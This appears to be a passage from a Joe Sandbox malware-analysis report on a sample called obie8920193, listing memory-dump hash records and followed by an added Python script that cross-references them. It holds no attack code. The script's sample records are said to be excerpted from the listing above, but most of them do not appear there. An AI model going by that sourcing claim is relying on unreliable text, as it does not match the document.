                      Memory Dump Source
                      • Source File: 00000007.00000002.864004992.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1fd000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7306a6c0cd1ab2d411fbb8dfcf63e7e607d0d3b8f8d84c8ff3035794112c797
                      • Instruction ID: 7eb935f2ec658674873c0bea5f78148d82fc6543460d10d6aaf0704ff4c0864a
                      • Opcode Fuzzy Hash: d7306a6c0cd1ab2d411fbb8dfcf63e7e607d0d3b8f8d84c8ff3035794112c797
                      • Instruction Fuzzy Hash: C511D37140E3C48FD7078B7099A42267F709F43214F1A85EBC5C5CF1A3C26A880AC763
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                      • API String ID: 0-3547488823
                      • Opcode ID: 2e8171b0b891612dca8656084d32e6e787263d2847c5d0d27b420c21f481ed3b
                      • Instruction ID: f356e8e1acf9689be1dda0f317056c743c8c524290f3739e32d8d99529b1e7e7
                      • Opcode Fuzzy Hash: 2e8171b0b891612dca8656084d32e6e787263d2847c5d0d27b420c21f481ed3b
                      • Instruction Fuzzy Hash: E2328074E01218CFDB68DF65D988B9DBBB2BF89300F2084A9D409AB355DB719E85DF10
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                      • API String ID: 0-3547488823
                      • Opcode ID: b3e7840b7d977e95a86ae57b777ae87fb917f2f2b570d2257887ec386b5da6c3
                      • Instruction ID: c73c2ce2b8b6a4153e8fb6c832125593db1646d0a57805688d5c18d8ab00d680
                      • Opcode Fuzzy Hash: b3e7840b7d977e95a86ae57b777ae87fb917f2f2b570d2257887ec386b5da6c3
                      • Instruction Fuzzy Hash: 2002C0B4E012188FDB58DF65D988B9DBBB2BF89300F2085A9D809A7355DB719E85CF10
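Every function in these memory dumps is described by the same repeated record (Memory Dump Source, Source File, Snapshot File, Opcode ID, Instruction ID, the two fuzzy hashes). Read one at a time the records say little; cross-referenced they show, for instance, that Opcode ID cf97df7c... occurs both in the process 5 dump at 0012D000 and in the process 7 dump at 001FD000, and that several process 7 functions at 00570000 have Instruction Fuzzy Hashes that differ in only a few positions. The Python below is an added worked example, not the sandbox's code, that parses such records and surfaces both patterns. The sample records are excerpted from the listing above (the empty API ID/String ID lines and the Opcode Fuzzy Hash are left out for brevity; the parser accepts them unchanged). Two things are assumptions rather than documented facts: that the first field of the .sdmp name is the process index (it matches the hcaresult_<index>_<run> snapshot names on this page), and that a positional Hamming distance on the hex string is a reasonable stand-in for Joe Sandbox's own, undocumented, fuzzy-hash similarity.

```python
"""Parse Joe Sandbox "Memory Dump Source / Similarity" records and cross-reference
them: which Opcode IDs appear in more than one process, and which pairs of
functions have near-identical Instruction Fuzzy Hashes."""
from itertools import combinations

# Excerpted from the report above (empty ID lines and Opcode Fuzzy Hash omitted).
SAMPLE_RECORDS = """
Memory Dump Source
• Source File: 00000005.00000002.364316500.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_12d000_obie8920193.jbxd
• Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
• Instruction ID: 72543b5870835b0820fb36b4c2fe8b74d50bb0709eb72f3117824000088e2165
• Instruction Fuzzy Hash: 76119D75904280DFDB16CF14E5C4B15FFA1FB84314F28C6ADD8494B656C33AD85ACBA2
Memory Dump Source
• Source File: 00000007.00000002.864004992.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_1fd000_obie8920193.jbxd
• Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
• Instruction ID: 3e3f7a4bf50355bf73bcfffc23bd96d5bf4b0209aacd46b2b5d84e4bb4fe8715
• Instruction Fuzzy Hash: 9311D075504244CFDB12CF10D9C4B25BF62FB44314F24C6ADE9494B256C33AD84ACF61
Memory Dump Source
• Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
• Opcode ID: fd2c181b8da4b83a856425a91e1f4a38323f09218190de012123acc4c58594c9
• Instruction ID: 20d727330a81ebf0a1e0abbddaf5f61ac32205adf155d2fe9e504ddcc4c50f94
• Instruction Fuzzy Hash: 14A19175E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF11
Memory Dump Source
• Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
• Opcode ID: 69e0767cd01c735a675977020a00c31f29fd7c3f43ffb1954bd0624ac62889a1
• Instruction ID: d8d4657af73bf5e853ce3f28150b130e985c1bb9610223d4c29dcae7f5d4c8fb
• Instruction Fuzzy Hash: FBA18075E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF11
"""


def parse_records(text):
    """Split the listing into one dict per "Memory Dump Source" record.
    Bullet lines become key/value pairs; lines without a colon (plugin name,
    "Similarity", "Strings") are ignored."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        if cur is None or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            # "<name>.sdmp, Offset: 0012D000, based on PE: false"
            name, _, rest = value.partition(",")
            cur["source"] = name.strip()
            # Assumption: the first dotted field is the process index; it agrees
            # with the hcaresult_<index>_<run> snapshot names in the same record.
            cur["process"] = int(name.strip().split(".")[0], 16)
            for part in rest.split(","):
                k, _, v = part.partition(":")
                cur[k.strip()] = v.strip()
        else:
            cur[key] = value
    return records


def shared_opcode_ids(records):
    """Opcode IDs seen in more than one process, with the (process, offset)
    locations where each was found."""
    seen = {}
    for r in records:
        seen.setdefault(r["Opcode ID"], []).append((r["process"], r["Offset"]))
    return {k: v for k, v in seen.items() if len({p for p, _ in v}) > 1}


def hamming(a, b):
    """Number of differing positions in two equal-length hex strings."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length are not comparable")
    return sum(x != y for x, y in zip(a, b))


def near_duplicates(records, max_distance=8):
    """Pairs of records whose Instruction Fuzzy Hashes differ in at most
    `max_distance` positions. Assumption: plain Hamming distance stands in for
    the sandbox's own similarity metric, which this page does not describe."""
    out = []
    for a, b in combinations(records, 2):
        d = hamming(a["Instruction Fuzzy Hash"], b["Instruction Fuzzy Hash"])
        if d <= max_distance:
            out.append((a["Instruction ID"][:12], b["Instruction ID"][:12], d))
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for opcode_id, where in shared_opcode_ids(recs).items():
        print(f"opcode {opcode_id[:12]}... seen in {where}")
    for a, b, d in near_duplicates(recs):
        print(f"instruction {a}... and {b}... differ in {d} hash positions")
```

On the four excerpted records this reports the cf97df7c... function at (5, 0012D000) and (7, 001FD000), and flags the 20d72733... / d8d4657a... pair at 00570000 as differing in 4 of 70 hash positions. A cross-process Opcode ID hit of this kind is what a reviewer would pull out when checking the report's injection signature against the dumps, and the Hamming threshold is deliberately a parameter: the hashes of genuinely unrelated functions in this sample differ in ten or more positions, so 8 separates the two populations here, but the cut-off should be re-checked on every new report rather than trusted blindly.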